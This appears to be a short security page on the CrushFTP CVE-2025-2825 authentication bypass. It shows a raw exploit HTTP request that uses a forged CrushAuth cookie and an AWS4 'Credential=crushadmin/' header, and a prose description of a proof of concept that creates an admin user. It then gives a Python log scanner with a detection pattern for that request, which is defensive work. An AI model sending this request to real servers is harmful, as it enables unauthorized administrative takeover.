CrushFTP

CVE-2025-2825 - Authentication Bypass

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

PoC

Proof of Concept for CVE-2025-31161 / CVE-2025-2825

This PoC exploits the authentication bypass vulnerability to create a new user account with admin-level permissions. The bypass requires the username (target_user) of an existing user on the CrushFTP server; the default is crushadmin.
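As an added defensive example (not part of this PoC page or the CrushFTP project), the following scanner flags web-server log entries that match the shape of the request shown above: a call to /WebInterface/function/ carrying an AWS4-HMAC-SHA256 Authorization header whose Credential is just "user/" with nothing after the slash. The log format, the sample lines and the user names are constructed for this example.

```python
import re

# Constructed log format for this example: <ts> <method> <path> "<Authorization header>"
LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<method>\S+) (?P<path>\S+) "(?P<auth>[^"]*)"$')

# Indicator taken from the request on this page: an AWS4-HMAC-SHA256 Credential
# whose value is only "<user>/" with no credential scope after the slash.
AUTH_RE = re.compile(r'AWS4-HMAC-SHA256\s+Credential=(?P<user>[^/\s,]+)/(?P<rest>[^,\s]*)')

def inspect_request(path: str, auth_header: str):
    """Return a reason string if the request matches the indicator, else None."""
    if not path.startswith("/WebInterface/function/"):
        return None
    m = AUTH_RE.search(auth_header)
    if m is None or m.group("rest") != "":
        return None
    return f"AWS4 Credential for user '{m.group('user')}' has empty scope after '/'"

def scan_log(text: str):
    """Return (line_no, ts, path, reason) for every log line matching the indicator."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if m is None:
            continue  # unparseable line: skip it rather than abort the scan
        reason = inspect_request(m.group("path"), m.group("auth"))
        if reason:
            findings.append((n, m.group("ts"), m.group("path"), reason))
    return findings

# Constructed sample log: line 1 mirrors the request on this page; line 2 carries a
# fully scoped credential as a normal S3-style signed request would; line 3 has none.
SAMPLE_LOG = """\
2025-03-30T10:00:01Z GET /WebInterface/function/?command=getUserList&c2f=1111 "AWS4-HMAC-SHA256 Credential=crushadmin/"
2025-03-30T10:00:05Z GET /WebInterface/function/?command=getUserList&c2f=2222 "AWS4-HMAC-SHA256 Credential=crushadmin/20250330/us-east-1/s3/aws4_request, SignedHeaders=host, Signature=deadbeef"
2025-03-30T10:00:09Z GET /WebInterface/ ""
"""

if __name__ == "__main__":
    for line_no, ts, path, reason in scan_log(SAMPLE_LOG):
        print(f"line {line_no} {ts} {path}: {reason}")
```

Only the first sample line is reported; a complete credential scope or a request outside the function endpoint is left alone.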
